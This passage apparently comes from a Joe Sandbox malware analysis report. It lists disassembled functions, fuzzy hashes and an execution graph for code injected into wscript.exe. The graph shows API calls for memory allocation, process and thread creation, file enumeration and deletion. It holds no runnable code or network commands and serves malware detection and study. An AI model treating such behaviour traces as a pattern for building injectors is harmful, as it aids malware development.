                                                                                                          • Instruction Fuzzy Hash: F791C570E002169BDF2EDF6DC8806BEBBA5BF44320F14451EE9A5A72C4D7B0AD408B52
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $$@
                                                                                                          • API String ID: 0-1194432280
                                                                                                          • Opcode ID: 7ffbcaf9a608608ce6ede075e168668b08a469500af0d747710b9c1584d060f3
                                                                                                          • Instruction ID: fd367e354c0f1ce59b8e389373f3948d16b3c581cf0c5527d2a68e180d89bac1
                                                                                                          • Opcode Fuzzy Hash: 7ffbcaf9a608608ce6ede075e168668b08a469500af0d747710b9c1584d060f3
                                                                                                          • Instruction Fuzzy Hash: 06811C72D002699BDB35CB54CC45BEEBBB8AB48754F0041EAEA59B7240D7705E85CFA0
                                                                                                          APIs
                                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0114CFBD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CallFilterFunc@8
                                                                                                          • String ID: @$@4Cw@4Cw
                                                                                                          • API String ID: 4062629308-3101775584
                                                                                                          • Opcode ID: 5cd93b4047db110c4acb45202e462e12528f403a3e6b5f5be8847b3146c24d9a
                                                                                                          • Instruction ID: a5cf49cd76bdda2418164d1ec34f04db0965835d8defbcce980efbe2d0be7e67
                                                                                                          • Opcode Fuzzy Hash: 5cd93b4047db110c4acb45202e462e12528f403a3e6b5f5be8847b3146c24d9a
                                                                                                          • Instruction Fuzzy Hash: 2241AE71900219DFCF29DFE9D880AAEBBB8FF64B40F00412AE955DB254D734D841CBA5

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:2.5%
                                                                                                          Dynamic/Decrypted Code Coverage:4.3%
                                                                                                          Signature Coverage:2.3%
                                                                                                          Total number of Nodes:442
                                                                                                          Total number of Limit Nodes:73
                                                                                                          execution_graph 98349 4922ad0 LdrInitializeThunk 98350 762430 98355 778cf0 98350->98355 98354 76247b 98356 778d0a 98355->98356 98364 4922c0a 98356->98364 98357 762466 98359 779780 98357->98359 98360 77980f 98359->98360 98362 7797ab 98359->98362 98367 4922e80 LdrInitializeThunk 98360->98367 98361 779840 98361->98354 98362->98354 98365 4922c11 98364->98365 98366 4922c1f LdrInitializeThunk 98364->98366 98365->98357 98366->98357 98367->98361 98368 7674b0 98369 7674c8 98368->98369 98371 767522 98368->98371 98369->98371 98372 76b430 98369->98372 98373 76b456 98372->98373 98374 76b689 98373->98374 98399 779ae0 98373->98399 98374->98371 98376 76b4cc 98376->98374 98402 77c9a0 98376->98402 98378 76b4eb 98378->98374 98379 76b5c2 98378->98379 98381 778cf0 LdrInitializeThunk 98378->98381 98380 76b5e1 98379->98380 98383 765cd0 LdrInitializeThunk 98379->98383 98387 76b671 98380->98387 98412 778860 98380->98412 98382 76b54d 98381->98382 98382->98379 98384 76b556 98382->98384 98383->98380 98384->98374 98385 76b5aa 98384->98385 98386 76b588 98384->98386 98408 765cd0 98384->98408 98388 768290 LdrInitializeThunk 98385->98388 98427 774970 LdrInitializeThunk 98386->98427 98393 768290 LdrInitializeThunk 98387->98393 98392 76b5b8 98388->98392 98392->98371 98395 76b67f 98393->98395 98394 76b648 98417 778910 98394->98417 98395->98371 98397 76b662 98422 778a70 98397->98422 98400 779afa 98399->98400 98401 779b0b CreateProcessInternalW 98400->98401 98401->98376 98403 77c910 98402->98403 98404 77c96d 98403->98404 98428 77b8b0 98403->98428 98404->98378 98406 77c94a 98407 77b7d0 RtlFreeHeap 98406->98407 98407->98404 98409 765cdd 98408->98409 98434 778ec0 98409->98434 98411 765d0e 98411->98386 98413 7788dd 98412->98413 98415 77888b 98412->98415 98440 49239b0 LdrInitializeThunk 98413->98440 98414 778902 98414->98394 98415->98394 98418 77893e 98417->98418 98419 778990 98417->98419 98418->98397 98441 4924340 LdrInitializeThunk 98419->98441 98420 7789b5 98420->98397 98423 778aed 98422->98423 98424 778a9b 98422->98424 98442 4922fb0 LdrInitializeThunk 98423->98442 98424->98387 98425 778b12 98425->98387 98427->98385 98431 779a00 98428->98431 98430 77b8cb 98430->98406 98432 779a1a 98431->98432 98433 779a2b RtlAllocateHeap 98432->98433 98433->98430 98435 778f74 98434->98435 98436 778ef2 98434->98436 98439 4922d10 LdrInitializeThunk 98435->98439 98436->98411 98437 778fb9 98437->98411 98439->98437 98440->98414 98441->98420 98442->98425 98443 766f30 98444 766f5a 98443->98444 98447 7680c0 98444->98447 98446 766f84 98448 7680dd 98447->98448 98454 778de0 98448->98454 98450 768134 98450->98446 98451 76812d 98451->98450 98452 778ec0 LdrInitializeThunk 98451->98452 98453 76815d 98452->98453 98453->98446 98455 778e7b 98454->98455 98456 778e0b 98454->98456 98459 4922f30 LdrInitializeThunk 98455->98459 98456->98451 98457 778eb4 98457->98451 98459->98457 98222 771cf0 98223 771d09 98222->98223 98224 771d51 98223->98224 98227 771d94 98223->98227 98229 771d99 98223->98229 98230 77b7d0 98224->98230 98228 77b7d0 RtlFreeHeap 98227->98228 98228->98229 98233 779a50 98230->98233 98232 771d61 98234 779a6a 98233->98234 98235 779a7b RtlFreeHeap 98234->98235 98235->98232 98236 7785f0 98237 77860a 98236->98237 98238 77861b RtlDosPathNameToNtPathName_U 98237->98238 98460 779630 98461 7796aa 98460->98461 98463 77965e 98460->98463 98462 7796c0 NtDeleteFile 98461->98462 98464 779530 98465 7795da 98464->98465 98467 77955e 98464->98467 98466 7795f0 NtReadFile 98465->98466 98239 75b660 98242 77b740 98239->98242 98241 75ccd1 98245 779850 98242->98245 98244 77b771 98244->98241 98246 7798e5 98245->98246 98248 77987b 98245->98248 98247 7798fb NtAllocateVirtualMemory 98246->98247 98247->98244 98248->98244 98468 7632a3 98473 767f10 98468->98473 98471 7796e0 NtClose 98472 7632cf 98471->98472 98474 767f2a 98473->98474 98478 7632b3 98473->98478 98479 778d90 98474->98479 98477 7796e0 NtClose 98477->98478 98478->98471 98478->98472 98480 778daa 98479->98480 98483 49235c0 LdrInitializeThunk 98480->98483 98481 767ffa 98481->98477 98483->98481 98484 759f20 98487 75a19b 98484->98487 98486 75a4d3 98487->98486 98488 77b430 98487->98488 98489 77b456 98488->98489 98494 754140 98489->98494 98491 77b462 98493 77b49b 98491->98493 98497 7757f0 98491->98497 98493->98486 98501 7633b0 98494->98501 98496 75414d 98496->98491 98498 775851 98497->98498 98500 77585e 98498->98500 98512 761b60 98498->98512 98500->98493 98502 7633cd 98501->98502 98504 7633e6 98502->98504 98505 77a140 98502->98505 98504->98496 98507 77a15a 98505->98507 98506 77a189 98506->98504 98507->98506 98508 778cf0 LdrInitializeThunk 98507->98508 98509 77a1e9 98508->98509 98510 77b7d0 RtlFreeHeap 98509->98510 98511 77a202 98510->98511 98511->98504 98513 761b9b 98512->98513 98528 768020 98513->98528 98515 761ba3 98516 761e83 98515->98516 98517 77b8b0 RtlAllocateHeap 98515->98517 98516->98500 98518 761bb9 98517->98518 98519 77b8b0 RtlAllocateHeap 98518->98519 98520 761bca 98519->98520 98521 77b8b0 RtlAllocateHeap 98520->98521 98522 761bdb 98521->98522 98527 761c72 98522->98527 98543 766bc0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98522->98543 98524 7646f0 LdrLoadDll 98525 761e32 98524->98525 98539 778130 98525->98539 98527->98524 98529 76804c 98528->98529 98530 767f10 2 API calls 98529->98530 98531 76806f 98530->98531 98532 768091 98531->98532 98533 768079 98531->98533 98535 7796e0 NtClose 98532->98535 98536 7680ad 98532->98536 98534 7796e0 NtClose 98533->98534 98537 768084 98533->98537 98534->98537 98538 7680a3 98535->98538 98536->98515 98537->98515 98538->98515 98540 778192 98539->98540 98541 77819f 98540->98541 98544 761ea0 98540->98544 98541->98516 98543->98527 98562 7682f0 98544->98562 98546 761ec0 98554 76241a 98546->98554 98566 771320 98546->98566 98548 761f1e 98548->98554 98569 77c870 98548->98569 98550 7620da 98551 77c9a0 2 API calls 98550->98551 98555 7620ef 98551->98555 98552 768290 LdrInitializeThunk 98557 76213c 98552->98557 98553 775a60 LdrInitializeThunk 98553->98557 98554->98541 98555->98557 98574 7609b0 98555->98574 98557->98552 98557->98553 98557->98554 98559 7609b0 LdrInitializeThunk 98557->98559 98558 768290 LdrInitializeThunk 98561 762293 98558->98561 98559->98557 98561->98557 98561->98558 98577 775a60 98561->98577 98563 7682fd 98562->98563 98564 768325 98563->98564 98565 76831e SetErrorMode 98563->98565 98564->98546 98565->98564 98567 77b740 NtAllocateVirtualMemory 98566->98567 98568 771341 98567->98568 98568->98548 98570 77c886 98569->98570 98571 77c880 98569->98571 98572 77b8b0 RtlAllocateHeap 98570->98572 98571->98550 98573 77c8ac 98572->98573 98573->98550 98581 779970 98574->98581 98578 775ac2 98577->98578 98580 775ad3 98578->98580 98586 767a40 98578->98586 98580->98561 98582 77998d 98581->98582 98585 4922c70 LdrInitializeThunk 98582->98585 98583 7609d2 98583->98561 98585->98583 98587 767a11 98586->98587 98588 767a74 98587->98588 98589 7609b0 LdrInitializeThunk 98587->98589 98588->98580 98590 767a31 98589->98590 98590->98580 98591 76c7a0 98593 76c7c9 98591->98593 98592 76c8cd 98593->98592 98594 76c873 FindFirstFileW 98593->98594 98594->98592 98597 76c88e 98594->98597 98595 76c8b4 FindNextFileW 98596 76c8c6 FindClose 98595->98596 98595->98597 98596->98592 98597->98595 98249 776260 98250 7762ba 98249->98250 98252 7762c7 98250->98252 98253 773c70 98250->98253 98254 77b740 NtAllocateVirtualMemory 98253->98254 98255 773cb1 98254->98255 98258 773dbe 98255->98258 98260 7646f0 98255->98260 98257 773d40 Sleep 98259 773cf7 98257->98259 98258->98252 98259->98257 98259->98258 98261 764714 98260->98261 98262 76471b 98261->98262 98263 764750 LdrLoadDll 98261->98263 98262->98259 98263->98262 98264 771960 98265 77197c 98264->98265 98266 7719a4 98265->98266 98267 7719b8 98265->98267 98268 7796e0 NtClose 98266->98268 98274 7796e0 98267->98274 98271 7719ad 98268->98271 98270 7719c1 98277 77b8f0 RtlAllocateHeap 98270->98277 98273 7719cc 98275 7796fd 98274->98275 98276 77970e NtClose 98275->98276 98276->98270 98277->98273 98598 778ca0 98599 778cbd 98598->98599 98602 4922df0 LdrInitializeThunk 98599->98602 98600 778ce5 98602->98600 98603 778b20 98604 778bb2 98603->98604 98606 778b4e 98603->98606 98608 4922ee0 LdrInitializeThunk 98604->98608 98605 778be3 98608->98605 98278 7672d0 98279 7672ec 98278->98279 98287 76733f 98278->98287 98281 7796e0 NtClose 98279->98281 98279->98287 98280 767477 98282 767307 98281->98282 98288 7666f0 NtClose LdrInitializeThunk LdrInitializeThunk 98282->98288 98284 767451 98284->98280 98290 7668c0 NtClose LdrInitializeThunk LdrInitializeThunk 98284->98290 98287->98280 98289 7666f0 NtClose LdrInitializeThunk LdrInitializeThunk 98287->98289 98288->98287 98289->98284 98290->98280 98291 765d50 98296 768290 98291->98296 98293 765d80 98295 765dac 98293->98295 98300 768210 98293->98300 98297 7682a3 98296->98297 98307 778bf0 98297->98307 98299 7682ce 98299->98293 98301 768254 98300->98301 98302 768275 98301->98302 98313 7789c0 98301->98313 98302->98293 98304 768265 98305 768281 98304->98305 98306 7796e0 NtClose 98304->98306 98305->98293 98306->98302 98308 778c71 98307->98308 98309 778c1e 98307->98309 98312 4922dd0 LdrInitializeThunk 98308->98312 98309->98299 98310 778c96 98310->98299 98312->98310 98314 778a40 98313->98314 98316 7789ee 98313->98316 98318 4924650 LdrInitializeThunk 98314->98318 98315 778a65 98315->98304 98316->98304 98318->98315 98319 77c8d0 98320 77b7d0 RtlFreeHeap 98319->98320 98321 77c8e5 98320->98321 98332 759ec0 98333 759ecf 98332->98333 98334 759f10 98333->98334 98335 759efd CreateThread 98333->98335 98612 76fa00 98613 76fa64 98612->98613 98641 766460 98613->98641 98615 76fb9e 98616 76fb97 98616->98615 98648 766570 98616->98648 98618 76fd43 98619 76fc1a 98619->98618 98620 76fd52 98619->98620 98652 76f7e0 98619->98652 98622 7796e0 NtClose 98620->98622 98623 76fd5c 98622->98623 98624 76fc56 98624->98620 98625 76fc61 98624->98625 98626 77b8b0 RtlAllocateHeap 98625->98626 98627 76fc8a 98626->98627 98628 76fc93 98627->98628 98629 76fca9 98627->98629 98630 7796e0 NtClose 98628->98630 98661 76f6d0 CoInitialize 98629->98661 98632 76fc9d 98630->98632 98633 76fcb7 98664 779170 98633->98664 98635 76fd32 98636 7796e0 NtClose 98635->98636 98637 76fd3c 98636->98637 98638 77b7d0 RtlFreeHeap 98637->98638 98638->98618 98639 76fcd5 98639->98635 98640 779170 LdrInitializeThunk 98639->98640 98640->98639 98642 766493 98641->98642 98643 7664b7 98642->98643 98668 779220 98642->98668 98643->98616 98645 7664da 98645->98643 98646 7796e0 NtClose 98645->98646 98647 76655a 98646->98647 98647->98616 98649 766595 98648->98649 98673 779010 98649->98673 98653 76f7fc 98652->98653 98654 7646f0 LdrLoadDll 98653->98654 98656 76f81a 98654->98656 98655 76f823 98655->98624 98656->98655 98657 7646f0 LdrLoadDll 98656->98657 98658 76f8ee 98657->98658 98659 7646f0 LdrLoadDll 98658->98659 98660 76f948 98658->98660 98659->98660 98660->98624 98663 76f735 98661->98663 98662 76f7cb CoUninitialize 98662->98633 98663->98662 98665 77918d 98664->98665 98678 4922ba0 LdrInitializeThunk 98665->98678 98666 7791bd 98666->98639 98669 77923d 98668->98669 98672 4922ca0 LdrInitializeThunk 98669->98672 98670 779269 98670->98645 98672->98670 98674 77902d 98673->98674 98677 4922c60 LdrInitializeThunk 98674->98677 98675 766609 98675->98619 98677->98675 98678->98666 98679 76af00 98684 76ac00 98679->98684 98681 76af0d 98698 76a870 98681->98698 98683 76af29 98685 76ac25 98684->98685 98709 768500 98685->98709 98688 76ad73 98688->98681 98690 76ad8a 98690->98681 98691 76ad81 98691->98690 98693 76ae78 98691->98693 98728 76a2c0 98691->98728 98695 76aedd 98693->98695 98737 76a630 98693->98737 98696 77b7d0 RtlFreeHeap 98695->98696 98697 76aee4 98696->98697 98697->98681 98699 76a886 98698->98699 98706 76a891 98698->98706 98700 77b8b0 RtlAllocateHeap 98699->98700 98700->98706 98701 76a8b8 98701->98683 98702 768500 GetFileAttributesW 98702->98706 98703 76abd5 98704 76abee 98703->98704 98705 77b7d0 RtlFreeHeap 98703->98705 98704->98683 98705->98704 98706->98701 98706->98702 98706->98703 98707 76a2c0 RtlFreeHeap 98706->98707 98708 76a630 RtlFreeHeap 98706->98708 98707->98706 98708->98706 98710 768521 98709->98710 98711 768528 GetFileAttributesW 98710->98711 98712 768533 98710->98712 98711->98712 98712->98688 98713 773540 98712->98713 98714 77354e 98713->98714 98715 773555 98713->98715 98714->98691 98716 7646f0 LdrLoadDll 98715->98716 98717 77358a 98716->98717 98718 773599 98717->98718 98741 773000 LdrLoadDll 98717->98741 98720 77b8b0 RtlAllocateHeap 98718->98720 98724 773744 98718->98724 98721 7735b2 98720->98721 98722 77373a 98721->98722 98721->98724 98725 7735ce 98721->98725 98723 77b7d0 RtlFreeHeap 98722->98723 98722->98724 98723->98724 98724->98691 98725->98724 98726 77b7d0 RtlFreeHeap 98725->98726 98727 77372e 98726->98727 98727->98691 98729 76a2e6 98728->98729 98742 76dd20 98729->98742 98731 76a358 98732 76a376 98731->98732 98733 76a4e0 98731->98733 98734 76a4c5 98732->98734 98747 76a180 98732->98747 98733->98734 98735 76a180 RtlFreeHeap 98733->98735 98734->98691 98735->98733 98738 76a656 98737->98738 98739 76dd20 RtlFreeHeap 98738->98739 98740 76a6dd 98739->98740 98740->98693 98741->98718 98744 76dd44 98742->98744 98743 76dd51 98743->98731 98744->98743 98745 77b7d0 RtlFreeHeap 98744->98745 98746 76dd94 98745->98746 98746->98731 98748 76a19d 98747->98748 98751 76ddb0 98748->98751 98750 76a2a3 98750->98732 98752 76ddd4 98751->98752 98753 76de7e 98752->98753 98754 77b7d0 RtlFreeHeap 98752->98754 98753->98750 98754->98753 98755 768980 98756 768985 98755->98756 98757 768971 98755->98757 98756->98757 98759 767250 98756->98759 98760 76729f 98759->98760 98761 767266 98759->98761 98760->98757 98761->98760 98763 7670c0 LdrLoadDll 98761->98763 98763->98760 98336 7793c0 98337 77947a 98336->98337 98339 7793f2 98336->98339 98338 779490 NtCreateFile 98337->98338 98764 770300 98765 770323 98764->98765 98766 7646f0 LdrLoadDll 98765->98766 98767 770347 98766->98767 98345 769dcb 98346 769dd1 98345->98346 98347 769dfd 98346->98347 98348 77b7d0 RtlFreeHeap 98346->98348 98348->98347 98768 760f8b PostThreadMessageW 98769 760f9d 98768->98769 98770 762908 98771 766460 2 API calls 98770->98771 98772 762933 98771->98772

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 27 759f20-75a191 28 75a19b-75a1a5 27->28 29 75a1a7-75a1c2 28->29 30 75a1de-75a1ef 28->30 31 75a1c4-75a1c8 29->31 32 75a1c9-75a1cb 29->32 33 75a200-75a20c 30->33 31->32 36 75a1cd-75a1d6 32->36 37 75a1dc 32->37 34 75a223 33->34 35 75a20e-75a221 33->35 39 75a22a-75a231 34->39 35->33 36->37 37->28 40 75a233-75a250 39->40 41 75a252-75a259 39->41 40->39 42 75a280 41->42 43 75a25b-75a27e 41->43 44 75a287-75a290 42->44 43->41 45 75a296-75a2a3 44->45 46 75a460-75a467 44->46 45->45 47 75a2a5-75a2a9 45->47 48 75a46d-75a474 46->48 49 75a56f-75a573 46->49 53 75a2d7-75a2da 47->53 54 75a2ab-75a2d5 47->54 50 75a47f-75a486 48->50 51 75a575-75a59a 49->51 52 75a59c-75a5a6 49->52 55 75a4ce call 77b430 50->55 56 75a488-75a4cc 50->56 51->49 57 75a5b7-75a5c1 52->57 58 75a2e0-75a2e4 53->58 54->47 68 75a4d3-75a4dd 55->68 62 75a476-75a47c 56->62 63 75a5f5-75a5ff 57->63 64 75a5c3-75a5f3 57->64 60 75a2e6-75a2fd 58->60 61 75a2ff-75a30b 58->61 60->58 66 75a330-75a33f 61->66 67 75a30d-75a32e 61->67 62->50 64->57 69 75a346-75a350 66->69 70 75a341 66->70 67->61 71 75a4ee-75a4fa 68->71 74 75a361-75a36d 69->74 70->46 72 75a507-75a511 71->72 73 75a4fc-75a505 71->73 75 75a522-75a52b 72->75 73->71 77 75a383-75a397 74->77 78 75a36f-75a381 74->78 79 75a543-75a547 75->79 80 75a52d-75a536 75->80 81 75a3a8-75a3b4 77->81 78->74 79->49 85 75a549-75a56d 79->85 83 75a541 80->83 84 75a538-75a53b 80->84 86 75a3c4-75a3ce 81->86 87 75a3b6-75a3c2 81->87 83->75 84->83 85->79 89 75a3df-75a3e8 86->89 87->81 91 75a3f8-75a3fc 89->91 92 75a3ea-75a3f6 89->92 93 75a3fe-75a405 91->93 94 75a408-75a40f 91->94 92->89 93->94 96 75a411-75a431 94->96 97 75a45b 94->97 98 75a433-75a437 96->98 99 75a438-75a43a 96->99 97->44 98->99 100 75a445-75a459 99->100 101 75a43c-75a442 99->101 100->94 101->100
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: s$ $%$+i$._$7$;w$<$$B$C^$C^K?$I}$K?$M$N$P$Q|K?C^$TN$c$ox$zs$~h$x
                                                                                                          • API String ID: 0-2531995965
                                                                                                          • Opcode ID: 58ac908a03dda97e2d506d0bbb24b1bacd85875c8410f95ecad036abca85a7c2
                                                                                                          • Instruction ID: d69b310f097657027b123f7f4612f5dd3fdc65b49acd1d9757443ff89cc418c9
                                                                                                          • Opcode Fuzzy Hash: 58ac908a03dda97e2d506d0bbb24b1bacd85875c8410f95ecad036abca85a7c2
                                                                                                          • Instruction Fuzzy Hash: 1A12F1B0D04229DBDB64CF58C899BDDBBB1BB44309F2081E9D50DAB281D7B85AC9CF51
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 0076C884
                                                                                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 0076C8BF
                                                                                                          • FindClose.KERNELBASE(?), ref: 0076C8CA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                          • String ID:
                                                                                                          • API String ID: 3541575487-0
                                                                                                          • Opcode ID: 7cd730f5b36d08e486d7cc197b06d5cfbfbdc64cf19af670e2e99e4c225fd556
                                                                                                          • Instruction ID: 7c1f7d2659192b50c4ab7d0b3646acb1b16db44990b1de4f8f038f258549779e
                                                                                                          • Opcode Fuzzy Hash: 7cd730f5b36d08e486d7cc197b06d5cfbfbdc64cf19af670e2e99e4c225fd556
                                                                                                          • Instruction Fuzzy Hash: 4031A571900309BBDB21EFA4CC85FFF777CAF84745F144599B949A7180D674AE848BA0
                                                                                                          APIs
                                                                                                          • NtCreateFile.NTDLL(?,?,?,?,?,52D358EE,?,?,?,?,?), ref: 007794C1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: 960bb6eeaca8ad18d0762e7e9371157d7f311785338fbc4ead58f158bfb04b6c
                                                                                                          • Instruction ID: 6d93cb606234187c5aa293951f5dc045ceb781748587baef6b3f47a3f8b74882
                                                                                                          • Opcode Fuzzy Hash: 960bb6eeaca8ad18d0762e7e9371157d7f311785338fbc4ead58f158bfb04b6c
                                                                                                          • Instruction Fuzzy Hash: 6131D2B5A01208AFDB54DF98D885EEFB7B9EF8C314F108209F918A7340D774A851CBA5
                                                                                                          APIs
                                                                                                          • NtReadFile.NTDLL(?,?,?,?,?,52D358EE,?,?,?), ref: 00779619
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: FileRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 2738559852-0
                                                                                                          • Opcode ID: 581bb27bbab1dcbc52c7cb802448ab171566f2e7f7abfad416baabf1a2ee80fe
                                                                                                          • Instruction ID: 855a3799ce3681b36356bad3c31966bdbd79055ca194f33b999984a067bf54c6
                                                                                                          • Opcode Fuzzy Hash: 581bb27bbab1dcbc52c7cb802448ab171566f2e7f7abfad416baabf1a2ee80fe
                                                                                                          • Instruction Fuzzy Hash: BD31F7B5A00208AFDB14DF98D885EEFB7B9EF8C714F008209FD18A7340D774A9518BA5
                                                                                                          APIs
                                                                                                          • NtAllocateVirtualMemory.NTDLL(00761F1E,?,0077819F,00000000,00000004,52D358EE,?,?,?,?,?,0077819F,00761F1E,0077819F,8DFFFEB0,00761F1E), ref: 00779918
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 2167126740-0
                                                                                                          • Opcode ID: 6004a6bbdfe21b5548b800a046e4eb376e4922fae85fb4f880ad311e9dcb8410
                                                                                                          • Instruction ID: d80b73add805c2955a7b8dac6422466d8af8fce07029b235dd70e26354190901
                                                                                                          • Opcode Fuzzy Hash: 6004a6bbdfe21b5548b800a046e4eb376e4922fae85fb4f880ad311e9dcb8410
                                                                                                          • Instruction Fuzzy Hash: ED211CB5A00208ABDB14DF98DC45EEF77B9EF89710F008209FD18A7241D774A811CBA5
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: DeleteFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 4033686569-0
                                                                                                          • Opcode ID: 70da47c343d85739f71d4273104cf6cbe2ee008118fb00db453942dce7088fb3
                                                                                                          • Instruction ID: bdd204b9062f0b729bc69410e0b8cdf6f7ee656fedc025f3c49b7c2c3449ec3a
                                                                                                          • Opcode Fuzzy Hash: 70da47c343d85739f71d4273104cf6cbe2ee008118fb00db453942dce7088fb3
                                                                                                          • Instruction Fuzzy Hash: E9117371640214BBEB10EB64CC45FEF776CEF85714F008109FA48A7281DBB9B9158BA6
                                                                                                          APIs
                                                                                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00779717
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: Close
                                                                                                          • String ID:
                                                                                                          • API String ID: 3535843008-0
                                                                                                          • Opcode ID: 28e2915287915a0d41cf43200706cdba27b30fd896c2b55e5b9696efd4849daf
                                                                                                          • Instruction ID: 9ad610851d551cad20a64752b499a185de9d5cfd06d2a6a8a13756b4faf6d2e2
                                                                                                          • Opcode Fuzzy Hash: 28e2915287915a0d41cf43200706cdba27b30fd896c2b55e5b9696efd4849daf
                                                                                                          • Instruction Fuzzy Hash: 50E02C36201204BBD620EA29DC01FEF776CCFC6720F808414FA08A7241CBB0B80187F0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: c2c7d51a3a739ba0a10f5fc54d21fc50660df808c7db1d3c06731409d773d1ff
                                                                                                          • Instruction ID: 250b30010cb16ee8283adf53d2bc8b4b207e8de7f7ce2142c9688254210e6951
                                                                                                          • Opcode Fuzzy Hash: c2c7d51a3a739ba0a10f5fc54d21fc50660df808c7db1d3c06731409d773d1ff
                                                                                                          • Instruction Fuzzy Hash: 54900265601600426140B158480840660999BE2306395C125B055D560C8618D955A269
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: a4516010aee602e8f055c95f1d83f67a22ac511d9e16276f0a4ac371bcf35fb8
                                                                                                          • Instruction ID: c7b304c2ba5292af005df5897ff1facab289e540a5d54bf601772ca4757fb996
                                                                                                          • Opcode Fuzzy Hash: a4516010aee602e8f055c95f1d83f67a22ac511d9e16276f0a4ac371bcf35fb8
